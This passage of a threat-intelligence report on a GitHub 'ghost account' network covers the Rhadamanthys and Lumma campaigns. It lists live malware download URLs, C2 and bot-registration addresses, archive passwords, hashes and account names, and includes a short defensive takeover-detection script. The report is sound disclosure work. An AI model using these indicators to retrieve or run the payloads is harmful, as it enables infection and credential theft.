| 2024-05-27T14:10:03Z GMT-5 | ellis441 | killimagaro001@proton.me | gooles54/Rison-Trading-Bot |
| 2024-05-27T14:31:44Z GMT-5 | ellis441 | killimagaro001@proton.me | gooles54/WPscn |
| 2024-05-30T20:24:15Z GMT-4 | gwala12 | zerocoinmarksirt21@proton.me | lzero121/iNS-vWS |
| 2024-05-30T20:24:29Z GMT-4 | gwala12 | zerocoinmarksirt21@proton.me | lzero121/tK-vWS |
| 2024-05-30T20:24:46Z GMT-4 | gwala12 | zerocoinmarksirt21@proton.me | lzero121/TWT-vWS |
| 2024-05-30T20:24:56Z GMT-4 | gwala12 | zerocoinmarksirt21@proton.me | lzero121/Ytb-Vws |
| 2024-05-31T20:58:21Z GMT-4 | qucher52 | svarovsky00012@proton.me | bleblquck/FT-Vieww |
| 2024-05-31T20:58:46Z GMT-4 | qucher52 | svarovsky00012@proton.me | bleblquck/Kck-Vw |
| 2024-05-31T20:58:59Z GMT-4 | qucher52 | svarovsky00012@proton.me | bleblquck/Trv-Vws |
| 2024-05-31T20:59:09Z GMT-4 | qucher52 | svarovsky00012@proton.me | bleblquck/Tw-Vws |
Interestingly, in the case of the repository valiso0/Mail-Ac-Generator, there are three commits instead of one. This
suggests that if the repository is not discovered and banned, it can be used in multiple campaigns. Typically, the behavior is
that the author creates a repository, commits the malicious README.md, and shortly after, the Stargazer accounts proceed to
star the repository.
Campaign II, Stargazers Ghost Network – Rhadamanthys
In many cases, the “Phishing” templates clearly targeted regular users despite the particular intended audience. There was
one specific case in which we didn’t know if they targeted Security Researchers or other Threat Actors. The template’s
title, “RisePro Stealer + HVNC Crack: The Ultimate Cybersecurity Threat,” provided, in theory, a cracked version of the
known infostealer RisePro. In reality, it infected the victims with a GO downloader that later dropped Rhadamanthys.
Figure 23 – RisePro Phishing Template.
Other repositories distributed the same short link, goo.su/n8J4mOH, with different phishing templates targeting different
audiences.
We observed direct external links to malicious scripts or links redirecting to another GitHub repository release, but threat
actors also utilized short links like goo.su and bit.ly. Searching for the previously mentioned short-link domains, we
obtained around 400 repositories.
Figure 24 – Results with “Download” and short-links.
The short Download link redirects the victims to download an archive file from maestrascreciendoenamor.com/Loader-Installers.zip.
Another short link, goo.su/rH3n, also redirects to this URL, making a total of 142 repositories that distribute
the GO downloader below.
802CBDBB7C195DAD3F763C38F21900A9006DB3292FFFC723B3CF75C10D239EA9 Loader-Installers\CFG.ini
B624949DF8B0E3A6153FDFB730A7C6F4990B6592EE0D922E1788433D276610F3 Loader-Installers\DriverUP.dll
060DE3B4CF3056F24DE882B4408020CEE0510CB1FF0E5007C621BC98E5B4BDF3 Loader-Installers\Loader Installer.exe
The downloader makes a GET request that appears to register the bot’s IP address and generate campaign statistics:
147.45.44.73:1445/bibika1337?reason=. When we visit the link, we see a Russian-language page that mentions the
number of launched downloaders (the last stats before clean action).
| Russian | English | No |
|---|---|---|
| Запущено всего | Total launched | 1123 |
| Запущено за две недели | Launched in two weeks | 1061 |
| Запущено за неделю | Launched in a week | 621 |
| Запущено за 2дня | Launched in 2 days | 131 |
| Запущено за день | Launched in a day | 44 |
In just 2 weeks, Rhadamanthys infected more than 1050 victims while being distributed via the Stargazers Ghost
Network.
Figure 25 – Campaign statistics.
Following two more GET requests, the victim downloads two password-protected archives:
1. 147.45.44.73:1488/moa/Tricky2.rar
2. 89.23.98.116:1444/Tricky.rar
Figure 26 – Multiple password-protected archives are stored inside those directories.
Figure 27 – Two archives are stored, the last one from 2024-06-09.
Both of the archives are decrypted using the same password, yanabibika.
Figure 28 – Password-protected archive unpacking.
938554DB472202C51069B3590820456EB37EC3680B555D1DE532623E01468D47 Tricky2\withya_MrAnon.cmd
64A49FF6862B2C924280D5E906BC36168112C85D9ACC2EB778B72EA1D4C17895 Tricky\prezi-desktop-6-26-0.exe
The executable inside the archive is the GO loader for Rhadamanthys, which is injected into
C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe and later communicates with its C&C,
147.78.103.199:2529.
The GitHub repositories for the Atlantida campaign and the Rhadamanthys campaign were created around the same time. The
earliest Rhadamanthys repository was created on 2024-05-30T18:51:26Z. The network operator employed around 120
GitHub accounts for this campaign.
Figure 29 – Accounts per Action.
Another interesting discovery occurred when we further examined the commits and forked accounts. On 2021-02-11T02:41:40Z
(not a typo, it is indeed 2021), the repository V-arc/Silverfish (53041402+V-arc@users.noreply.github.com / 71246462@qq.com)
was created and, between February and August 2021, was forked by 25 other accounts. On 2024-06-02T09:06:59Z, V-arc updated
the original README.md file, which now contained the phishing link distributing Rhadamanthys. Two of the 25 forked
repositories applied the commit from the original repository. That specific repository was chosen to be “infected” because
it is the most popular one owned by this account.
Figure 30 – Updating last commit from 2021-02-13T15:41:31Z.
The V-arc GitHub account was created on 2019-07-18T09:42:29Z but was updated on 2024-05-31T11:14:43Z. We aren’t
sure exactly what kind of update occurred, but possibly a new GPG key was generated. As expected, the account also has a
repository with the pattern # V-arc1\n1, created on 2024-06-08T19:03:31Z. The initial commit on the malicious
repository was possibly made using the Web interface on 2021-02-11T02:41:40Z in the timezone UTC+8. The rest of the
commits from around the same time (within days) possibly happened from a local environment on 2021-02-11T02:44:59Z,
2021-02-11T06:25:26Z, and the last legitimate commit on 2021-02-13T15:41:31Z. While all the “initial” commits happened in
the timezone UTC+8, the last malicious commit in 2024 occurred in UTC+3. We consider it highly unlikely that the
repository started as malicious and only started pushing malware 3 years later. Possibly, the account was compromised and
then included in the Stargazers Ghost Network. With that bit of information, we consider the ~1100
accounts/repositories with the pattern # {username}1\n1 a test of compromised accounts’ credentials/rights.
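The dormancy-plus-timezone reasoning above can be turned into a triage heuristic for repository owners and defenders. The following is an added example, not Check Point's tooling: the function name, the one-year threshold and the (timestamp, offset) input shape are assumptions, and the sample data is constructed from the commit times and timezones quoted in this section.

```python
from datetime import datetime, timedelta, timezone

# Constructed sample: the V-arc/Silverfish commit times and author UTC
# offsets quoted in this section (timestamps are UTC, offsets in hours).
SILVERFISH = [
    ("2021-02-11T02:41:40Z", 8),
    ("2021-02-11T02:44:59Z", 8),
    ("2021-02-11T06:25:26Z", 8),
    ("2021-02-13T15:41:31Z", 8),
    ("2024-06-02T09:06:59Z", 3),
]


def _parse(ts):
    """Parse a GitHub-style UTC timestamp into an aware datetime."""
    return datetime.strptime(ts, "%Y-%m-%dT%H:%M:%SZ").replace(tzinfo=timezone.utc)


def dormant_takeover_signals(commits, min_gap_days=365):
    """Flag commits that revive a repository after a long silence.

    commits: iterable of (utc_timestamp, author_utc_offset_hours).
    A finding is "high" when the reviving commit also carries a UTC offset
    never seen in the earlier history, otherwise "medium".
    min_gap_days is an assumed threshold, not a value from the report.
    """
    ordered = sorted((_parse(ts), off) for ts, off in commits)
    findings, seen_offsets = [], set()
    for i, (when, off) in enumerate(ordered):
        if i > 0:
            gap = when - ordered[i - 1][0]
            if gap >= timedelta(days=min_gap_days):
                local = when.astimezone(timezone(timedelta(hours=off)))
                findings.append({
                    "commit_utc": when.strftime("%Y-%m-%dT%H:%M:%SZ"),
                    "commit_local": local.isoformat(),
                    "gap_days": gap.days,
                    "offset": off,
                    "prior_offsets": sorted(seen_offsets),
                    "severity": "high" if off not in seen_offsets else "medium",
                })
        seen_offsets.add(off)
    return findings


if __name__ == "__main__":
    for finding in dormant_takeover_signals(SILVERFISH):
        print(finding)
```

A single "high" finding is a reason to review the account's recent security events and credentials, not proof of compromise: legitimate maintainers also relocate and return to old projects.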
According to the campaign statistics, 687 of the activities on malicious repositories distributing the GO downloader
occurred on May 31, 2024, indicating the campaign’s start date.
Figure 31 – Rhadamanthys campaign, GitHub accounts activities.
The authors of the README.md files that were forked by the rest of the accounts:
| Commit Date | Commit Author | Commit Email | Repository Owner | No. Malicious Repositories |
| --- | --- | --- | --- | --- |
| 2024-05-29T20:55:01Z GMT+0 | batuhanodbs | 104384818+batuhanodbs@users.noreply.github.com | batuhanodbs | 1 |
| 2024-05-29T21:00:55Z GMT+0 | HeangHorn | 75545632+HeangHorn@users.noreply.github.com | HeangHorn | 1 |
| 2024-05-29T21:09:37Z GMT+0 | dblancolascarez | 107002366+dblancolascarez@users.noreply.github.com | dblancolascarez | 1 |
| 2024-05-29T21:15:46Z GMT+0 | yessine-agrebi | 59874615+yessine-agrebi@users.noreply.github.com | yessine-agrebi | 1 |
| 2024-05-30T11:59:15Z GMT+0 | SpacyXyt | 80075528+SpacyXyt@users.noreply.github.com | SpacyXyt | 2 |
| 2024-05-30T18:51:26Z GMT+0 | Essence-Of-Slimez-37 | 120878149+Essence-Of-Slimez-37@users.noreply.github.com | Essence-Of-Slimez-37 | 27 |
| 2024-05-30T19:40:27Z GMT+0 | Major2000 | majormadobe@gmail.com | Major2000 | 2 |
| 2024-05-31T13:48:49Z GMT+0 | Molano11 | 124221765+Molano11@users.noreply.github.com | Molano11 | 2 |
| 2024-05-31T15:21:05Z GMT+0 | Danms661 | dnsrm9787@gmail.com | Danms661 | 3 |
| 2024-05-31T21:50:08Z GMT+0 | blackvn05 | 62129353+blackvn05@users.noreply.github.com | blackvn05 | 1 |
| 2024-06-01T12:55:33Z GMT+0 | ySunSh1ne | 113144625+ySunSh1ne@users.noreply.github.com | ySunSh1ne | 1 |
| 2024-06-01T12:56:02Z GMT+0 | AmerHashima | 43539190+AmerHashima@users.noreply.github.com | AmerHashima | 1 |
| 2024-06-01T12:56:45Z GMT+0 | jgprimaki | 93926139+jgprimaki@users.noreply.github.com | jgprimaki | 1 |
| 2024-06-02T09:06:59Z GMT+3 | V-arc | 53041402+V-arc@users.noreply.github.com | V-arc | 1 |
Stargazer Goblin and Malware Distributed via Network
Comparing the two campaigns, the difference in links and modus operandi, despite both being “starred” and “forked” by the
same accounts, leads us to believe that the Stargazers Ghost Network functions as a Malware/Link Distribution as a
Service (DaaS). In this model, threat actors share their malicious links or malware, possibly at different prices, and
these are distributed through the malicious GitHub repositories and “legitimized” by the Stargazer accounts. Check Point
Research is tracking the threat actor/group behind this service as Stargazer Goblin. This group provides, operates, and
maintains the Stargazers Ghost Network, which distributes malicious links or malware via their Ghost GitHub accounts.
Malware families distributed via the network include:
Atlantida Stealer
Rhadamanthys
Lumma Stealer
RedLine
RisePro
Since the beginning of June 2024, we observed 211 unique still active repositories pushing malicious links, compared to 135
active from May. Since May 2024, GitHub has taken down approximately 1559 repositories and their related GitHub
accounts.
Figure 32 – Active repositories per last update date.
From the accounts we have been tracking, 8 different accounts have bestowed 530 stars to repositories. While we do not
have access to all the starred repositories as old ones were taken down, all of them were updated around the same date
2024-05-31T19:00:32Z:
@Pids134, @rego321, @Molano11, @nepalhack, @PeeKhaye, @Ozgur010101, @posyshp, @ProfessorAMi
While none of the accounts we mention could provide us with information on when the network was created, there is an
account whose name indicates its purpose as part of the network. @StarGhostSG, with 253 starred repositories, was created
on 2022-08-31T00:05:25Z. This is the creation date, but the network could have been either under development or already
operating on a smaller scale during that time.
Dark-Web Forums
While searching Dark Web forums, we found an advertisement from July 8, 2023, promoting the described network. The
advertisement banner is written in both English and Russian. According to the post, this account offers services for starring,
following, forking, and watching GitHub accounts and repositories, as well as fulfilling any other requested actions on
GitHub.
Figure 33 – The first advertisement was on 2023-07-08.
The prices vary depending on the services provided. For example, starring a repository with 100 accounts costs $10, with a
rate of 10 stars per USD. Providing a trusted account with an “aged” repository costs $2. Discounts are available for
purchases over $500.
Figure 34 – Service details and prices.
Based on this information and the number of repositories and actions that occurred from mid-May to mid-June 2024,
Check Point Research calculated Stargazer Goblin’s potential profit to be approximately $8,000. We believe that more
actions and repositories took place during this time, making the calculated profit just a fraction of the actual profit.
Considering that Stargazers Ghost Network has operated publicly since July 2023 and likely on a smaller scale since
August 2022, we estimate the total profit to be approximately $100,000 for the entire lifespan of Stargazers Ghost
Network. GitHub could probably produce a more accurate estimation of the profit, as they have more insights into the
actions that occurred on banned accounts and repositories.
Past, Present, and Future Ghosts Networks
Check Point Research, based on intelligence, considered it highly probable that GitHub Ghost accounts are only one part
of the grand picture, with other Ghost accounts operating on different platforms as an integral part of an even larger
Distribution as a Service universe. This theory gained support when we discovered a GitHub repository sharing a link to an
unlisted YouTube video. The video instructs potential victims how to download and install a supposedly “free” version of
Adobe Photoshop.
Figure 35 – GitHub account with download and YouTube links.
In the YouTube video, the threat actor is seen downloading a password-protected archive from clouds-folder[.]com,
extracting it using the password 2424, and then proceeding to execute the installer (Lumma Stealer). During our careful
examination of the video, we identified the full path to the dist folder,
C:\Users\Peresvet\DevelNextProjects\test\build\dist.
Figure 36 – Ghost YouTube Account and malicious unlisted Video.
The YouTube Ghost account also comments on its own video. Additionally, we observed the actual owner of the
compromised GitHub account, @ANGEOM21, replying to one of the Ghost’s comments. This interaction validates our
previous assumption that many of the accounts in the Stargazers Ghost Network are compromised.
Figure 37 – YouTube Ghost account’s video comment section.
We believe that Stargazer Goblin created a universe of Ghost accounts operating across various platforms such as
GitHub, Twitter, YouTube, Discord, Instagram, Facebook, and many others. This further leads us to believe that the
Atlantida Stealer campaigns, which specifically targeted social media-oriented users, could have been performed by
Stargazer Goblin to obtain accounts for the Ghost networks. Similar to GitHub, other platforms can be utilized to
legitimize malicious phishing and distribute links and malware to victims through posts, repositories, videos, tweets, and
channels, depending on the features each platform offers.
Future Ghost accounts could potentially utilize Artificial Intelligence (AI) models to generate more targeted and diverse
content, from text to images and videos. By considering targeted users’ replies, these AI-driven accounts could promote
phishing material not only through standardized templates but also through customized responses tailored to real users’
needs and interactions. A new era of malware distribution is here, where we expect these types of operations to occur more
frequently, making it increasingly difficult to distinguish legitimate content from malicious material.
Conclusion
Stargazer Goblin created an extremely sophisticated malware distribution operation that avoids detection because GitHub is
considered a legitimate website, bypasses suspicions of malicious activities, and minimizes and recovers from any damage
when GitHub disrupts their network. Utilizing multiple accounts and profiles that perform different activities, from starring
to hosting the repository, committing the phishing template, and hosting malicious releases, enables the Stargazers Ghost
Network to minimize its losses when GitHub acts to disrupt its operations, as usually only one part of
the whole operation is disrupted rather than all the involved accounts.
The campaigns performed by the Stargazers Ghost Network and malware distributed via this service are extremely
successful. In a short period of time, thousands of victims installed software from what appears to be a legitimate repository
without suspecting any malicious intent. The heavily victim-oriented phishing templates allow threat actors to infect victims
with specific profiles and online accounts, making the infections even more valuable.
The actual number of accounts performing various network operations is unclear, as the network is constantly evolving. Our
latest calculations suggest there are more than 3,000 Ghost accounts. Considering a campaign of approximately 30
repositories utilizing around 380 Ghost accounts, the total number may be even higher. While GitHub does ban suspect
accounts in many cases, the operations run uninterrupted for a long time before those measures are taken.
Some of the Ghost accounts appear to have been created by the operators, while others seem to be compromised “normal”
GitHub accounts. This makes GitHub credentials valuable in underground marketplaces, as the network also incorporates
such accounts. The addition of compromised accounts into the network makes it challenging to estimate when Stargazer
Goblin started their malicious activities, as it is difficult to separate clearly malicious activities from those of normal users.
However, based on some core accounts, we consider August 2022 to be when the network development began and/or was
working on a smaller scale. The first public advertisement of Stargazers Ghost Network occurred the following year, on
July 8, 2023. The total profit for Stargazer Goblin is estimated at $100,000.
We are entering a new era of malware distribution, where ghost accounts organically promote and distribute malicious links
across various platforms. Future ghost accounts powered by artificial intelligence could launch even more targeted
campaigns, making it increasingly difficult to distinguish between legitimate content and malicious material.
Recommendations
GitHub has long been used for malicious activities, but the use of this network in attacks makes it fairly
difficult for normal users to detect suspicious repositories. To mitigate the risks of being affected by such threats, it is
essential to:
1. Keep operating systems and applications updated through timely patches and other means.
2. Be cautious of unexpected emails/messages with links, especially from unknown senders.
3. Enhance cybersecurity awareness among employees.
4. Consult security specialists for any doubts or uncertainties.
Protection
Check Point Threat Emulation and Harmony Endpoint provide comprehensive coverage of attack tactics, file types, and
operating systems and protect its customers against this type of attack and malware families described in this report.
InfoStealer.Win.Atlantida.*
Trojan.WIN32.AtlantidaStealer.A
Trojan.WIN32.AtlantidaStealer.B
InfoStealer.Wins.Lumma.ta.S
InfoStealer.Wins.Lumma.ta.T
InfoStealer.Wins.Lumma.ta.U
InfoStealer.Win.Lumma.N
InfoStealer.Win.Lumma.O
Injector.Win.RunPE.C
Loader.Wins.GoBitLoader.A
Trojan.Wins.Imphash.taim.LV
Trojan.Win32.RedLine Stealer.TC.6a9fRQRh
InfoStealer.Wins.Redline.ta.BY
IOCs
Source: https://research.checkpoint.com/2024/stargazers-ghost-network/